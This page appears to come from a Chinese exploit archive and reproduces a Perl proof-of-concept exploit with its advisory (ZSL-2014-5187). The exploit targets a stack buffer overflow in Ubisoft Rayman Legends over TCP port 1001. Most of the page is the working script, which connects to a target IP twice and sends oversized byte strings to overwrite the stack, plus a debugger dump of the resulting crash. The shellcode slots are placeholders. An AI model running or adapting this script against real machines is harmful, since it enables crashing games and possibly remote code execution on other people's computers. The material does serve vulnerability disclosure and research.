扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 |
#!/usr/bin/perl # # # Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability # # # Vendor: Ubisoft Entertainment S.A. # Product web page: http://www.ubi.com # Affected version: 1.2.103716, 1.1.100477 and 1.0.95278 # # Summary: Rayman Legends is a 2013 platform game developed by Ubisoft # Montpellier and published by Ubisoft. It is the fifth main title in # the Rayman series and the direct sequel to the 2011 game Rayman Origins. # The game was released for Microsoft Windows, Xbox 360, PlayStation 3, # Wii U, and PlayStation Vita platforms in August and September 2013. # PlayStation 4 and Xbox One versions were released in February 2014. # # Desc: The vulnerability is caused due to a memset() boundary error in the # processing of incoming data thru raw socket connections on TCP port 1001, # which can be exploited to cause a stack based buffer overflow by sending a # long string of bytes on the second connection. Successful exploitation could # allow execution of arbitrary code on the affected node. # # =========================================================================== # # (15a8.f0c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000 # eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0 nv up ei pl nz na pe cy # cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010207 # MSVCR100!memset+0x5f: # 715e26df f3abrep stos dword ptr es:[edi] # 0:028> d esp # 0f16dcec42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00BBBBd........... # 0f16dcfc42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1cBBBBBBBB"...PBK. # 0f16dd0c90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00.C......(....... # 0f16dd1c50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0fPBK.l.......L... # 0f16dd2ce3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07....H.......<... # 0f16dd3c3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41<......u....AAAA # 0f16dd4c41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42AAAAAAAAAAAABBBB # 0f16dd5c43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC # # =========================================================================== # # # Tested on: Microsoft Windows 7 Professional SP1 (EN) #Microsoft Windows 7 Ultimate SP1 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2014-5187 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php # # # 22.05.2014 # # use IO::Socket; print " @****************************************@ || | Ubisoft Rayman Legends BoF PoC Script| || |ZSL-2014-5187 | || @****************************************@ "; $ip="$ARGV[0]"; if($#ARGV!=0) { print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n"; exit(); } print "\n\x20\x1c\x20Target: $ip\n"; print "\x20\x1c\x20Initiating first connection\n"; sleep 2; $conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp'); if(!$conn1) { print "\n\x20*** Connection error!\n"; exit(); } else { print "\x20\x1c\x20Connection established\n"; } print $conn1 "\x44"x36; print $conn1 "\x45\x45\x45\x45"; print $conn1 "\x46"x2000; # SC contain print "\x20\x1c\x20Payload sent\n"; close $conn1; print "\x20\x1c\x20First stage completed\n\x20\x1c\n"; print "\x20\x1c\x20Initiating second connection\n"; sleep 2; $conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp'); if(!$conn2) { print "\n\x20*** Connection error!\n"; exit(); } else { print "\x20\x1c\x20Connection established\n"; } print $conn2 "\x41" x 16; print $conn2 "\x42\x42\x42\x42"; # ESP -> print $conn2 "\x43"x1000; # SC contain print "\x20\x1c\x20Payload sent\n"; print "\x20\x1c\x20Second stage completed\n"; close $conn2; print "\x20\x1c\x20t00t!\n"; |
体验盒子
